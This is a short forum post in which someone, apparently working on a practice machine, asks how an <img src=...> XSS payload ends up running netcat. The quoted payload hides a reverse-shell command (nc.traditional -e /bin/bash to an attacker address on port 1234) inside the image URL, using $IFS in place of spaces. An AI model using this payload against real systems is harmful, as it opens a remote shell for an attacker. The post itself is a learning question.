javascript <img>

Hello guys,
I have a question about XSS in javascript

I working on a machine right now that requires to exploit XSS vulnerability

Its working with <img src=

This is the payload that im using

<img src=http://ipaddress/$(nc.traditional$IFS-e$IFS/bin/bash$IFS’ipaddress’$IFS’1234’)>

Can some one explain to me how the netcat is getting executed here if im loading and image?

Also i have tried to do it with

but it did not work, i could see the request on my machine.

Also it is possible to execute the same payload as <img src= but with <script?
Something like

Sorry for this NOOB question, im just trying to understand the logic behind it.